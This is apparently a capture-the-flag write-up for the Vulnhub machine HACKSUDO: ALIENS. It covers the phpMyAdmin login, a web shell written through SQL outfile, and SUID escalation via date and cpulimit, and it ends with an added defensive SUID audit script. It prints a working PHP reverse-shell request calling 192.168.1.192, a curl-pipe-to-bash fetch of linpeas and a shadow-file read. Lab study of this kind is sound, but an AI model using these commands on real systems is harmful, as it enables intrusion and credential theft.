This box should be easy. This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh)
This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION which was LFI to SSH login to editing a Python script. I don’t have any more to say about that.
SSH, plus HTTP on ports 80 and 9000.
This has got phpMyAdmin, which isn’t working with any kind of default creds. I enumerate the webserver and find some stuff, but nothing too interesting.
This has stuff about aliens. Let’s look around:
What’s in backup? mysql.bak. What’s in that?
With this, we can login to phpMyAdmin.
After I’ve looked around, grabbed some hashes and had a go at cracking them, then tried password reuse on SSH with no success, I use a SQL statement to create a PHP file on the server:
This works and I use it to get a shell:
GET /cmd1.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.192",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
I run linpeas:
www-data@hacksudo:/dev/shm$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | bash
Which shows that date has the SUID bit; GTFOBins gives a file read:
sudo date -f $LFILE
I use this to read the shadow file, and then send the hash for hacksudo to john, where it cracks. Now, we can SSH in as hacksudo.
I run linpeas again, and we have cpulimit with the SUID bit in our home directory. Again, it’s GTFOBins:
So fairly easy, but I don’t think I’ve done the SQL to outfile in phpMyAdmin before.
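Both privilege escalations above depended on SUID bits that a stock install would not carry (date, and cpulimit in a home directory). The following is an added example, not part of the original write-up: a small audit that lists SUID files missing from an allow-list and marks those in unusual locations. The BASELINE list, the AUDIT_ROOT variable and the reason labels are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: report SUID files that are not in a known-good baseline.
# BASELINE is a constructed allow-list; build the real one from a clean
# install of your own distribution.
BASELINE="/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount
/usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# audit_suid ROOT
# Prints "REASON<TAB>PATH" for every unexpected SUID file under ROOT.
# PATH is reported relative to ROOT, so a mounted disk image can be audited
# with the same baseline as a live system (ROOT=/).
audit_suid() {
    root=${1%/}
    allowed=$(printf ' %s ' $BASELINE)   # flatten the list to one line
    find "$root/" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        rel=${f#"$root"}
        # Skip anything the baseline expects to be SUID.
        case "$allowed" in *" $rel "*) continue ;; esac
        case "$rel" in
            # SUID files here are almost never legitimate.
            /home/*|/tmp/*|/var/tmp/*|/dev/shm/*)
                printf '%s\t%s\n' "unusual-location" "$rel" ;;
            *)
                printf '%s\t%s\n' "not-in-baseline" "$rel" ;;
        esac
    done
}

# Optional direct run: AUDIT_ROOT=/ sh suid_audit.sh
if [ -n "${AUDIT_ROOT:-}" ]; then
    audit_suid "$AUDIT_ROOT"
fi
```

On a host configured like this box, the audit would report date as not-in-baseline and the cpulimit copy in the home directory as unusual-location; removing the bit with chmod u-s closes both paths.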